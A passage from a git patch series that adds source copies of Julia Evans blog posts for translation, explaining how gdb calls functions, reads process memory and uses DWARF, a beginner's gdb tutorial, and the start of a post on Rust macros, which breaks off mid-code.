+I discovered this week that you can call C functions from gdb! I thought this was cool because I’d previously thought of gdb as mostly a read-only debugging tool.
+
+I was really surprised by that (how does that WORK??). As I often do, I asked [on Twitter][6] how that even works, and I got a lot of really useful answers! My favorite answer was [Evan Klitzke’s example C code][7] showing a way to do it. Code that _works_ is very exciting!
+
+I believe (through some stracing & experiments) that that example C code is different from how gdb actually calls functions, so I’ll talk about what I’ve figured out about what gdb does in this post and how I’ve figured it out.
+
+There is a lot I still don’t know about how gdb calls functions, and very likely some things in here are wrong.
+
+### What does it mean to call a C function from gdb?
+
+Before I get into how this works, let’s talk quickly about why I found it surprising / nonobvious.
+
+So, you have a running C program (the “target program”). You want to run a function from it. To do that, you need to basically:
+
+* pause the program (because it is already running code!)
+
+* find the address of the function you want to call (using the symbol table)
+
+* convince the program (the “target program”) to jump to that address
+
+* when the function returns, restore the instruction pointer and registers to what they were before
+
+Using the symbol table to figure out the address of the function you want to call is pretty straightforward – here’s some sketchy (but working!) Rust code that I’ve been using on Linux to do that. This code uses the [elf crate][8]. If I wanted to find the address of the `foo` function in PID 2345, I’d run `elf_symbol_value("/proc/2345/exe", "foo")`.
+
+```
+fn elf_symbol_value(file_name: &str, symbol_name: &str) -> Result<u64, Box<std::error::Error>> {
+ // open the ELF file
+ let file = elf::File::open_path(file_name).ok().ok_or("parse error")?;
+ // loop over all the sections & symbols until you find the right one!
+ let sections = &file.sections;
+ for s in sections {
+ for sym in file.get_symbols(&s).ok().ok_or("parse error")? {
+ if sym.name == symbol_name {
+ return Ok(sym.value);
+ }
+ }
+ }
+ None.ok_or("No symbol found")?
+}
+
+```
+
+This won’t totally work on its own, you also need to look at the memory maps of the file and add the symbol offset to the start of the place that file is mapped. But finding the memory maps isn’t so hard, they’re in `/proc/PID/maps`.
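+
+As a rough illustration (the PID, addresses and paths below are made up), the maps file looks something like this:
+
+```
+$ grep 'r-xp' /proc/2345/maps
+00400000-00401000 r-xp 00000000 08:01 1311234      /home/user/test
+7f1c2a3b4000-7f1c2a574000 r-xp 00000000 08:01 920451       /lib/x86_64-linux-gnu/libc-2.23.so
+```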
+
+Anyway, this is all to say that finding the address of the function to call seemed straightforward to me but that the rest of it (change the instruction pointer? restore the registers? what else?) didn’t seem so obvious!
+
+### You can’t just jump
+
+I kind of said this already but – you can’t just find the address of the function you want to run and then jump to that address. I tried that in gdb (`jump foo`) and the program segfaulted. Makes sense!
+
+### How you can call C functions from gdb
+
+First, let’s see that this is possible. I wrote a tiny C program that sleeps for 1000 seconds and called it `test.c`:
+
+```
+#include <unistd.h>
+
+int foo() {
+ return 3;
+}
+int main() {
+ sleep(1000);
+}
+
+```
+
+Next, compile and run it:
+
+```
+$ gcc -o test test.c
+$ ./test
+
+```
+
+Finally, let’s attach to the `test` program with gdb:
+
+```
+$ sudo gdb -p $(pgrep -f test)
+(gdb) p foo()
+$1 = 3
+(gdb) quit
+
+```
+
+So I ran `p foo()` and it ran the function! That’s fun.
+
+### Why is this useful?
+
+a few possible uses for this:
+
+* it lets you treat gdb a little bit like a C REPL, which is fun and I imagine could be useful for development
+
+* utility functions to display / navigate complex data structures quickly while debugging in gdb (thanks [@invalidop][1])
+
+* [set an arbitrary process’s namespace while it’s running][2] (featuring a not-so-surprising appearance from my colleague [nelhage][3]!)
+
+* probably more that I don’t know about
+
+### How it works
+
+I got a variety of useful answers on Twitter when I asked how calling functions from gdb works! A lot of them were like “well you get the address of the function from the symbol table” but that is not the whole story!!
+
+One person pointed me to this nice 2 part series on how gdb works that they’d written: [Debugging with the natives, part 1][9] and [Debugging with the natives, part 2][10]. Part 1 explains approximately how calling functions works (or could work – figuring out what gdb **actually** does isn’t trivial, but I’ll try my best!).
+
+The steps outlined there are:
+
+1. Stop the process
+
+2. Create a new stack frame (far away from the actual stack)
+
+3. Save all the registers
+
+4. Set the registers to the arguments you want to call your function with
+
+5. Set the stack pointer to the new stack frame
+
+6. Put a trap instruction somewhere in memory
+
+7. Set the return address to that trap instruction
+
+8. Set the instruction pointer register to the address of the function you want to call
+
+9. Start the process again!
+
+I’m not going to go through how gdb does all of these (I don’t know!) but here are a few things I’ve learned about the various pieces this evening.
+
+**Create a stack frame**
+
+If you’re going to run a C function, most likely it needs a stack to store variables on! You definitely don’t want it to clobber your current stack. Concretely – before gdb calls your function (by setting the instruction pointer to it and letting it go), it needs to set the **stack pointer** to… something.
+
+There was some speculation on Twitter about how this works:
+
+> i think it constructs a new stack frame for the call right on top of the stack where you’re sitting!
+
+and:
+
+> Are you certain it does that? It could allocate a pseudo stack, then temporarily change sp value to that location. You could try, put a breakpoint there and look at the sp register address, see if it’s contiguous to your current program register?
+
+I did an experiment where (inside gdb) I ran:`
+
+```
+(gdb) p $rsp
+$7 = (void *) 0x7ffea3d0bca8
+(gdb) break foo
+Breakpoint 1 at 0x40052a
+(gdb) p foo()
+Breakpoint 1, 0x000000000040052a in foo ()
+(gdb) p $rsp
+$8 = (void *) 0x7ffea3d0bc00
+
+```
+
+This seems in line with the “gdb constructs a new stack frame for the call right on top of the stack where you’re sitting” theory, since the stack pointer (`$rsp`) goes from being `...bca8` to `..bc00` – stack pointers grow downward, so a `bc00`stack pointer is **after** a `bca8` pointer. Interesting!
+
+So it seems like gdb just creates the new stack frames right where you are. That’s a bit surprising to me!
+
+**change the instruction pointer**
+
+Let’s see whether gdb changes the instruction pointer!
+
+```
+(gdb) p $rip
+$1 = (void (*)()) 0x7fae7d29a2f0 <__nanosleep_nocancel+7>
+(gdb) b foo
+Breakpoint 1 at 0x40052a
+(gdb) p foo()
+Breakpoint 1, 0x000000000040052a in foo ()
+(gdb) p $rip
+$3 = (void (*)()) 0x40052a
+
+```
+
+It does! The instruction pointer changes from `0x7fae7d29a2f0` to `0x40052a` (the address of the `foo` function).
+
+I stared at the strace output and I still don’t understand **how** it changes, but that’s okay.
+
+**aside: how breakpoints are set!!**
+
+Above I wrote `break foo`. I straced gdb while running all of this and understood almost nothing but I found ONE THING that makes sense to me!!
+
+Here are some of the system calls that gdb uses to set a breakpoint. It’s really simple! It replaces one instruction with `cc` (which [https://defuse.ca/online-x86-assembler.htm][11] tells me means `int3` which means `send SIGTRAP`), and then once the program is interrupted, it puts the instruction back the way it was.
+
+I was putting a breakpoint on a function `foo` with the address `0x400528`.
+
+This `PTRACE_POKEDATA` is how gdb changes the code of running programs.
+
+```
+// change the 0x400528 instructions
+25622 ptrace(PTRACE_PEEKTEXT, 25618, 0x400528, [0x5d00000003b8e589]) = 0
+25622 ptrace(PTRACE_POKEDATA, 25618, 0x400528, 0x5d00000003cce589) = 0
+// start the program running
+25622 ptrace(PTRACE_CONT, 25618, 0x1, SIG_0) = 0
+// get a signal when it hits the breakpoint
+25622 ptrace(PTRACE_GETSIGINFO, 25618, NULL, {si_signo=SIGTRAP, si_code=SI_KERNEL, si_value={int=-1447215360, ptr=0x7ffda9bd3f00}}) = 0
+// change the 0x400528 instructions back to what they were before
+25622 ptrace(PTRACE_PEEKTEXT, 25618, 0x400528, [0x5d00000003cce589]) = 0
+25622 ptrace(PTRACE_POKEDATA, 25618, 0x400528, 0x5d00000003b8e589) = 0
+
+```
+
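+Here’s a little sketch of that peek/poke dance in C, in case it helps. It’s a simplified version (it patches the byte at the breakpoint address itself, assumes x86-64, and the helper names are made up), not gdb’s real code:
+
+```
+#include <sys/ptrace.h>
+#include <sys/types.h>
+
+/* hypothetical helper: returns the original word so we can restore it later */
+long set_breakpoint(pid_t pid, unsigned long addr) {
+    long orig = ptrace(PTRACE_PEEKTEXT, pid, (void *)addr, NULL);
+    long patched = (orig & ~0xffL) | 0xcc;        /* int3 in the low byte */
+    ptrace(PTRACE_POKEDATA, pid, (void *)addr, (void *)patched);
+    return orig;
+}
+
+/* once the SIGTRAP arrives, put the original instruction back */
+void clear_breakpoint(pid_t pid, unsigned long addr, long orig) {
+    ptrace(PTRACE_POKEDATA, pid, (void *)addr, (void *)orig);
+}
+```
+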
+**put a trap instruction somewhere**
+
+When gdb runs a function, it **also** puts trap instructions in a bunch of places! Here’s one of them (per strace). It’s basically replacing one instruction with `cc` (`int3`).
+
+```
+5908 ptrace(PTRACE_PEEKTEXT, 5810, 0x7f6fa7c0b260, [0x48f389fd89485355]) = 0
+5908 ptrace(PTRACE_PEEKTEXT, 5810, 0x7f6fa7c0b260, [0x48f389fd89485355]) = 0
+5908 ptrace(PTRACE_POKEDATA, 5810, 0x7f6fa7c0b260, 0x48f389fd894853cc) = 0
+
+```
+
+What’s `0x7f6fa7c0b260`? Well, I looked in the process’s memory maps, and it turns out it’s somewhere in `/lib/x86_64-linux-gnu/libc-2.23.so`. That’s weird! Why is gdb putting trap instructions in libc?
+
+Well, let’s see what function that’s in. It turns out it’s `__libc_siglongjmp`. The other functions gdb is putting traps in are `__longjmp`, `____longjmp_chk`, `dl_main`, and `_dl_close_worker`.
+
+Why? I don’t know! Maybe for some reason when our function `foo()` returns, it’s calling `longjmp`, and that is how gdb gets control back? I’m not sure.
+
+### how gdb calls functions is complicated!
+
+I’m going to stop there (it’s 1am!), but now I know a little more!
+
+It seems like the answer to “how does gdb call a function?” is definitely not that simple. I found it interesting to try to figure a little bit of it out and hopefully you have too!
+
+I still have a lot of unanswered questions about how exactly gdb does all of these things, but that’s okay. I don’t really need to know the details of how this works and I’m happy to have a slightly improved understanding.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2018/01/04/how-does-gdb-call-functions/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca/
+[1]:https://twitter.com/invalidop/status/949161146526781440
+[2]:https://github.com/baloo/setns/blob/master/setns.c
+[3]:https://github.com/nelhage
+[4]:https://jvns.ca/blog/2016/08/10/how-does-gdb-work/
+[5]:https://jvns.ca/blog/2014/02/10/three-steps-to-learning-gdb/
+[6]:https://twitter.com/b0rk/status/948060808243765248
+[7]:https://github.com/eklitzke/ptrace-call-userspace/blob/master/call_fprintf.c
+[8]:https://cole14.github.io/rust-elf
+[9]:https://www.cl.cam.ac.uk/~srk31/blog/2016/02/25/#native-debugging-part-1
+[10]:https://www.cl.cam.ac.uk/~srk31/blog/2017/01/30/#native-debugging-part-2
+[11]:https://defuse.ca/online-x86-assembler.htm
From 9245a76c66d17853108dfa36576fd60c3dd583b1 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:37:12 +0800
Subject: [PATCH 302/371] =?UTF-8?q?20180113-2=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20160810 How does gdb work.md | 218 +++++++++++++++++++++
1 file changed, 218 insertions(+)
create mode 100644 sources/tech/20160810 How does gdb work.md
diff --git a/sources/tech/20160810 How does gdb work.md b/sources/tech/20160810 How does gdb work.md
new file mode 100644
index 0000000000..4159f1c65a
--- /dev/null
+++ b/sources/tech/20160810 How does gdb work.md
@@ -0,0 +1,218 @@
+How does gdb work?
+============================================================
+
+Hello! Today I was working a bit on my [ruby stacktrace project][1] and I realized that now I know a couple of things about how gdb works internally.
+
+Lately I’ve been using gdb to look at Ruby programs, so we’re going to be running gdb on a Ruby program. This really means the Ruby interpreter. First, we’re going to print out the address of a global variable: `ruby_current_thread`:
+
+### getting a global variable
+
+Here’s how to get the address of the global `ruby_current_thread`:
+
+```
+$ sudo gdb -p 2983
+(gdb) p & ruby_current_thread
+$2 = (rb_thread_t **) 0x5598a9a8f7f0
+
+```
+
+There are a few places a variable can live: on the heap, the stack, or in your program’s text. Global variables are part of your program! You can think of them as being allocated at compile time, kind of. It turns out we can figure out the address of a global variable pretty easily! Let’s see how `gdb` came up with `0x5598a9a8f7f0`.
+
+We can find the approximate region this variable lives in by looking at a cool file in `/proc` called `/proc/$pid/maps`.
+
+```
+$ sudo cat /proc/2983/maps | grep bin/ruby
+5598a9605000-5598a9886000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5598a9a86000-5598a9a8b000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5598a9a8b000-5598a9a8d000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+
+```
+
+So! There’s this starting address `5598a9605000`. That’s _like_ `0x5598a9a8f7f0`, but different. How different? Well, here’s what I get when I subtract them:
+
+```
+(gdb) p/x 0x5598a9a8f7f0 - 0x5598a9605000
+$4 = 0x48a7f0
+
+```
+
+“What’s that number?”, you might ask? WELL. Let’s look at the **symbol table** for our program with `nm`.
+
+```
+sudo nm /proc/2983/exe | grep ruby_current_thread
+000000000048a7f0 b ruby_current_thread
+
+```
+
+What’s that we see? Could it be `0x48a7f0`? Yes it is! So!! If we want to find the address of a global variable in our program, all we need to do is look up the name of the variable in the symbol table, and then add that to the start of the range in `/proc/whatever/maps`, and we’re done!
+
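+Here’s a rough sketch of the `/proc/whatever/maps` half of that in C. `find_map_base` is a hypothetical helper with no error handling, just to show the idea of grabbing the start address of the first matching mapping:
+
+```
+#include <stdio.h>
+#include <string.h>
+
+/* hypothetical helper: find the base address a binary was mapped at */
+unsigned long find_map_base(int pid, const char *binary_substring) {
+    char path[64], line[512];
+    unsigned long base = 0;
+    snprintf(path, sizeof(path), "/proc/%d/maps", pid);
+    FILE *f = fopen(path, "r");
+    while (f && fgets(line, sizeof(line), f)) {
+        if (strstr(line, binary_substring)) {
+            sscanf(line, "%lx-", &base);   /* start of the address range */
+            break;
+        }
+    }
+    if (f) fclose(f);
+    return base;   /* symbol address = base + offset from the symbol table */
+}
+```
+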
+So now we know how gdb does that. But gdb does so much more!! Let’s skip ahead to…
+
+### dereferencing pointers
+
+```
+(gdb) p ruby_current_thread
+$1 = (rb_thread_t *) 0x5598ab3235b0
+
+```
+
+The next thing we’re going to do is **dereference** that `ruby_current_thread` pointer. We want to see what’s in that address! To do that, gdb will run a bunch of system calls like this:
+
+```
+ptrace(PTRACE_PEEKTEXT, 2983, 0x5598a9a8f7f0, [0x5598ab3235b0]) = 0
+
+```
+
+You remember this address `0x5598a9a8f7f0`? gdb is asking “hey, what’s in that address exactly”? `2983` is the PID of the process we’re running gdb on. It’s using the `ptrace` system call which is how gdb does everything.
+
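+If you wanted to do that dereference yourself, a minimal sketch (not gdb’s code; it reuses the PID and address from above as assumptions) looks something like this:
+
+```
+#include <errno.h>
+#include <stdio.h>
+#include <sys/ptrace.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+int main(void) {
+    pid_t pid = 2983;                        /* the Ruby process from above */
+    unsigned long addr = 0x5598a9a8f7f0;     /* &ruby_current_thread */
+
+    ptrace(PTRACE_ATTACH, pid, NULL, NULL);  /* stop the process */
+    waitpid(pid, NULL, 0);
+
+    errno = 0;
+    long value = ptrace(PTRACE_PEEKDATA, pid, (void *)addr, NULL);
+    if (errno == 0)
+        printf("ruby_current_thread = %#lx\n", value);   /* 0x5598ab3235b0 here */
+
+    ptrace(PTRACE_DETACH, pid, NULL, NULL);
+    return 0;
+}
+```
+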
+Awesome! So we can dereference memory and figure out what bytes are at what memory addresses. Some useful gdb commands to know here are `x/40w variable` and `x/40b variable` which will display 40 words / bytes at a given address, respectively.
+
+### describing structs
+
+The memory at an address looks like this. A bunch of bytes!
+
+```
+(gdb) x/40b ruby_current_thread
+0x5598ab3235b0: 16 -90 55 -85 -104 85 0 0
+0x5598ab3235b8: 32 47 50 -85 -104 85 0 0
+0x5598ab3235c0: 16 -64 -55 115 -97 127 0 0
+0x5598ab3235c8: 0 0 2 0 0 0 0 0
+0x5598ab3235d0: -96 -83 -39 115 -97 127 0 0
+
+```
+
+That’s useful, but not that useful! If you are a human like me and want to know what it MEANS, you need more. Like this:
+
+```
+(gdb) p *(ruby_current_thread)
+$8 = {self = 94114195940880, vm = 0x5598ab322f20, stack = 0x7f9f73c9c010,
+ stack_size = 131072, cfp = 0x7f9f73d9ada0, safe_level = 0, raised_flag = 0,
+ last_status = 8, state = 0, waiting_fd = -1, passed_block = 0x0,
+ passed_bmethod_me = 0x0, passed_ci = 0x0, top_self = 94114195612680,
+ top_wrapper = 0, base_block = 0x0, root_lep = 0x0, root_svar = 8, thread_id =
+ 140322820187904,
+
+```
+
+GOODNESS. That is a lot more useful. How does gdb know that there are all these cool fields like `stack_size`? Enter DWARF. DWARF is a way to store extra debugging data about your program, so that debuggers like gdb can do their job better! It’s generally stored as part of a binary. If I run `dwarfdump` on my Ruby binary, I get some output like this:
+
+(I’ve redacted it heavily to make it easier to understand)
+
+```
+DW_AT_name "rb_thread_struct"
+DW_AT_byte_size 0x000003e8
+DW_TAG_member
+ DW_AT_name "self"
+ DW_AT_type <0x00000579>
+ DW_AT_data_member_location DW_OP_plus_uconst 0
+DW_TAG_member
+ DW_AT_name "vm"
+ DW_AT_type <0x0000270c>
+ DW_AT_data_member_location DW_OP_plus_uconst 8
+DW_TAG_member
+ DW_AT_name "stack"
+ DW_AT_type <0x000006b3>
+ DW_AT_data_member_location DW_OP_plus_uconst 16
+DW_TAG_member
+ DW_AT_name "stack_size"
+ DW_AT_type <0x00000031>
+ DW_AT_data_member_location DW_OP_plus_uconst 24
+DW_TAG_member
+ DW_AT_name "cfp"
+ DW_AT_type <0x00002712>
+ DW_AT_data_member_location DW_OP_plus_uconst 32
+DW_TAG_member
+ DW_AT_name "safe_level"
+ DW_AT_type <0x00000066>
+
+```
+
+So. The name of the type of `ruby_current_thread` is `rb_thread_struct`. It has size `0x3e8` (or 1000 bytes), and it has a bunch of member items. `stack_size` is one of them, at an offset of 24, and it has type 31. What’s 31? No worries! We can look that up in the DWARF info too!
+
+```
+< 1><0x00000031> DW_TAG_typedef
+ DW_AT_name "size_t"
+ DW_AT_type <0x0000003c>
+< 1><0x0000003c> DW_TAG_base_type
+ DW_AT_byte_size 0x00000008
+ DW_AT_encoding DW_ATE_unsigned
+ DW_AT_name "long unsigned int"
+
+```
+
+So! `stack_size` has type `size_t`, which means `long unsigned int`, and is 8 bytes. That means that we can read the stack size!
+
+How that would break down, once we have the DWARF debugging data, is:
+
+1. Read the region of memory that `ruby_current_thread` is pointing to
+
+2. Add 24 bytes to get to `stack_size`
+
+3. Read 8 bytes (in little-endian format, since we’re on x86)
+
+4. Get the answer!
+
+Which in this case is 131072 or 128 kb.
+
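+Here’s a sketch of those steps in C, assuming we’re already attached to the process with ptrace like before, and reusing the addresses and the offset 24 from above (this is illustrative, not what gdb literally does):
+
+```
+#include <stdio.h>
+#include <sys/ptrace.h>
+#include <sys/types.h>
+
+int main(void) {
+    pid_t pid = 2983;
+    unsigned long global_addr = 0x5598a9a8f7f0;   /* &ruby_current_thread */
+
+    /* step 1: read the pointer stored in the global variable */
+    long thread_ptr = ptrace(PTRACE_PEEKDATA, pid, (void *)global_addr, NULL);
+
+    /* steps 2 & 3: stack_size is 24 bytes into rb_thread_struct and is 8
+       bytes, so one word-sized PEEKDATA is enough on x86-64 (little-endian) */
+    long stack_size = ptrace(PTRACE_PEEKDATA, pid, (void *)(thread_ptr + 24), NULL);
+
+    printf("stack_size = %ld\n", stack_size);     /* 131072 in this example */
+    return 0;
+}
+```
+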
+To me, this makes it a lot more obvious what debugging info is **for** – if we didn’t have all this extra metadata about what all these variables meant, we would have no idea what the bytes at address `0x5598ab3235b0` meant.
+
+This is also why you can install debug info for a program separately from your program – gdb doesn’t care where it gets the extra debug info from.
+
+### DWARF is confusing
+
+I’ve been reading a bunch of DWARF info recently. Right now I’m using libdwarf which hasn’t been the best experience – the API is confusing, you initialize everything in a weird way, and it’s really slow (it takes 0.3 seconds to read all the debugging data out of my Ruby program which seems ridiculous). I’ve been told that libdw from elfutils is better.
+
+Also, I casually remarked that you can look at `DW_AT_data_member_location` to get the offset of a struct member! But I looked up on Stack Overflow how to actually do that and I got [this answer][2]. Basically you start with a check like:
+
+```
+dwarf_whatform(attrs[i], &form, &error);
+ if (form == DW_FORM_data1 || form == DW_FORM_data2
+     || form == DW_FORM_data2 || form == DW_FORM_data4
+     || form == DW_FORM_data8 || form == DW_FORM_udata) {
+
+```
+
+and then it keeps GOING. Why are there 8 million different `DW_FORM_data` things I need to check for? What is happening? I have no idea.
+
+Anyway my impression is that DWARF is a large and complicated standard (and possibly the libraries people use to generate DWARF are subtly incompatible?), but it’s what we have, so that’s what we work with!
+
+I think it’s really cool that I can write code that reads DWARF and my code actually mostly works. Except when it crashes. I’m working on that.
+
+### unwinding stacktraces
+
+In an earlier version of this post, I said that gdb unwinds stacktraces using libunwind. It turns out that this isn’t true at all!
+
+Someone who’s worked on gdb a lot emailed me to say that they actually spent a ton of time figuring out how to unwind stacktraces so that they can do a better job than libunwind does. This means that if you get stopped in the middle of a weird program with less debug info than you might hope for that’s done something strange with its stack, gdb will try to figure out where you are anyway. Thanks <3
+
+### other things gdb does
+
+The few things I’ve described here (reading memory, understanding DWARF to show you structs) aren’t everything gdb does – just looking through Brendan Gregg’s [gdb example from yesterday][3], we see that gdb also knows how to
+
+* disassemble assembly
+
+* show you the contents of your registers
+
+and in terms of manipulating your program, it can
+
+* set breakpoints and step through a program
+
+* modify memory (!! danger !!)
+
+Knowing more about how gdb works makes me feel a lot more confident when using it! I used to get really confused because gdb kind of acts like a C REPL sometimes – you type `ruby_current_thread->cfp->iseq`, and it feels like writing C code! But you’re not really writing C at all, and it was easy for me to run into limitations in gdb and not understand why.
+
+Knowing that it’s using DWARF to figure out the contents of the structs gives me a better mental model and more correct expectations! Awesome.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2016/08/10/how-does-gdb-work/
+
+作者:[ Julia Evans][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca/
+[1]:http://jvns.ca/blog/2016/06/12/a-weird-system-call-process-vm-readv/
+[2]:https://stackoverflow.com/questions/25047329/how-to-get-struct-member-offset-from-dwarf-info
+[3]:http://www.brendangregg.com/blog/2016-08-09/gdb-example-ncurses.html
From 109c69e45e7e4831cf50578ea21b4490effff504 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:38:58 +0800
Subject: [PATCH 303/371] =?UTF-8?q?20180113-3=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20140210 Three steps to learning GDB.md | 113 ++++++++++++++++++
1 file changed, 113 insertions(+)
create mode 100644 sources/tech/20140210 Three steps to learning GDB.md
diff --git a/sources/tech/20140210 Three steps to learning GDB.md b/sources/tech/20140210 Three steps to learning GDB.md
new file mode 100644
index 0000000000..94279a2374
--- /dev/null
+++ b/sources/tech/20140210 Three steps to learning GDB.md
@@ -0,0 +1,113 @@
+Three steps to learning GDB
+============================================================
+
+Debugging C programs used to scare me a lot. Then I was writing my [operating system][2] and I had so many bugs to debug! I was extremely fortunate to be using the emulator qemu, which lets me attach a debugger to my operating system. The debugger is called `gdb`.
+
+I’m going to explain a couple of small things you can do with `gdb`, because I found it really confusing to get started. We’re going to set a breakpoint and examine some memory in a tiny program.
+
+### 1\. Set breakpoints
+
+If you’ve ever used a debugger before, you’ve probably set a breakpoint.
+
+Here’s the program that we’re going to be “debugging” (though there aren’t any bugs):
+
+```
+#include <stdio.h>
+void do_thing() {
+ printf("Hi!\n");
+}
+int main() {
+ do_thing();
+}
+
+```
+
+Save this as `hello.c`. We can debug it with gdb like this:
+
+```
+bork@kiwi ~> gcc -g hello.c -o hello
+bork@kiwi ~> cat
+bork@kiwi ~> gdb ./hello
+```
+
+This compiles `hello.c` with debugging symbols (so that gdb can do better work), and gives us a kind of scary prompt that just says
+
+`(gdb)`
+
+We can then set a breakpoint using the `break` command, and then `run` the program.
+
+```
+(gdb) break do_thing
+Breakpoint 1 at 0x4004f8
+(gdb) run
+Starting program: /home/bork/hello
+
+Breakpoint 1, 0x00000000004004f8 in do_thing ()
+```
+
+This stops the program at the beginning of `do_thing`.
+
+We can find out where we are in the call stack with `where`: (thanks to [@mgedmin][3] for the tip)
+
+```
+(gdb) where
+#0 do_thing () at hello.c:3
+#1 0x08050cdb in main () at hello.c:6
+(gdb)
+```
+
+### 2\. Look at some assembly code
+
+We can look at the assembly code for our function using the `disassemble` command! This is cool. This is x86 assembly. I don’t understand it very well, but the line that says `callq` is what does the `printf` function call.
+
+```
+(gdb) disassemble do_thing
+Dump of assembler code for function do_thing:
+ 0x00000000004004f4 <+0>: push %rbp
+ 0x00000000004004f5 <+1>: mov %rsp,%rbp
+=> 0x00000000004004f8 <+4>: mov $0x40060c,%edi
+ 0x00000000004004fd <+9>: callq 0x4003f0
+ 0x0000000000400502 <+14>: pop %rbp
+ 0x0000000000400503 <+15>: retq
+```
+
+You can also shorten `disassemble` to `disas`.
+
+### 3\. Examine some memory!
+
+The main thing I used `gdb` for when I was debugging my kernel was to examine regions of memory to make sure they were what I thought they were. The command for examining memory is `examine`, or `x` for short. We’re going to use `x`.
+
+From looking at that assembly above, it seems like `0x40060c` might be the address of the string we’re printing. Let’s check!
+
+```
+(gdb) x/s 0x40060c
+0x40060c: "Hi!"
+```
+
+It is! Neat! Look at that. The `/s` part of `x/s` means “show it to me like it’s a string”. I could also have said “show me 10 characters” like this:
+
+```
+(gdb) x/10c 0x40060c
+0x40060c: 72 'H' 105 'i' 33 '!' 0 '\000' 1 '\001' 27 '\033' 3 '\003' 59 ';'
+0x400614: 52 '4' 0 '\000'
+```
+
+You can see that the first four characters are ‘H’, ‘i’, ‘!’, and ‘\0’, and after that there’s more unrelated stuff.
+
+I know that gdb does lots of other stuff, but I still don’t know it very well and `x` and `break` got me pretty far. You can read the [documentation for examining memory][4].
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2014/02/10/three-steps-to-learning-gdb/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/categories/spytools
+[2]:http://jvns.ca/blog/categories/kernel
+[3]:https://twitter.com/mgedmin
+[4]:https://ftp.gnu.org/old-gnu/Manuals/gdb-5.1.1/html_chapter/gdb_9.html#SEC56
From 519daa8935d45c5a17e73e21770ee11d93344bd6 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:40:22 +0800
Subject: [PATCH 304/371] =?UTF-8?q?20180113-4=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171224 My first Rust macro.md | 145 +++++++++++++++++++
1 file changed, 145 insertions(+)
create mode 100644 sources/tech/20171224 My first Rust macro.md
diff --git a/sources/tech/20171224 My first Rust macro.md b/sources/tech/20171224 My first Rust macro.md
new file mode 100644
index 0000000000..a8002e050b
--- /dev/null
+++ b/sources/tech/20171224 My first Rust macro.md
@@ -0,0 +1,145 @@
+My first Rust macro
+============================================================
+
+Last night I wrote a Rust macro for the first time!! The most striking thing to me about this was how **easy** it was – I kind of expected it to be a weird hard finicky thing, and instead I found that I could go from “I don’t know how macros work but I think I could do this with a macro” to “wow I’m done” in less than an hour.
+
+I used [these examples][2] to figure out how to write my macro.
+
+### what’s a macro?
+
+There’s more than one kind of macro in Rust –
+
+* macros defined using `macro_rules` (they have an exclamation mark and you call them like functions – `my_macro!()`)
+
+* “syntax extensions” / “procedural macros” like `#[derive(Debug)]` (you put these like annotations on your functions)
+
+* built-in macros like `println!`
+
+[Macros in Rust][3] and [Macros in Rust part II][4] seem like a nice overview of the different kinds, with examples.
+
+I’m not actually going to try to explain what a macro **is**, instead I will just show you what I used a macro for yesterday and hopefully that will be interesting. I’m going to be talking about `macro_rules!`, I don’t understand syntax extension/procedural macros yet.
+
+### compiling the `get_stack_trace` function for 30 different Ruby versions
+
+I’d written some functions that got the stack trace out of a running Ruby program (`get_stack_trace`). But the function I wrote only worked for Ruby 2.2.0 – here’s what it looked like. Basically it imported some structs from `bindings::ruby_2_2_0` and then used them.
+
+```
+use bindings::ruby_2_2_0::{rb_control_frame_struct, rb_thread_t, RString};
+fn get_stack_trace(pid: pid_t) -> Vec {
+ // some code using rb_control_frame_struct, rb_thread_t, RString
+}
+
+```
+
+Let’s say I wanted to instead have a version of `get_stack_trace` that worked for Ruby 2.1.6. `bindings::ruby_2_2_0` and `bindings::ruby_2_1_6` had basically all the same structs in them. But `bindings::ruby_2_1_6::rb_thread_t` wasn’t the **same** as `bindings::ruby_2_2_0::rb_thread_t`, it just had the same name and most of the same struct members.
+
+So I could implement a working function for Ruby 2.1.6 really easily! I just need to basically replace `2_2_0` with `2_1_6`, and then the compiler would generate different code (because `rb_thread_t` is different). Here’s a sketch of what the Ruby 2.1.6 version would look like:
+
+```
+use bindings::ruby_2_1_6::{rb_control_frame_struct, rb_thread_t, RString};
+fn get_stack_trace(pid: pid_t) -> Vec {
+ // some code using rb_control_frame_struct, rb_thread_t, RString
+}
+
+```
+
+### what I wanted to do
+
+I basically wanted to write code like this, to generate a `get_stack_trace` function for every Ruby version. The code inside `get_stack_trace` would be the same in every case, it’s just the `use bindings::ruby_2_1_3` that needed to be different
+
+```
+pub mod ruby_2_1_3 {
+ use bindings::ruby_2_1_3::{rb_control_frame_struct, rb_thread_t, RString};
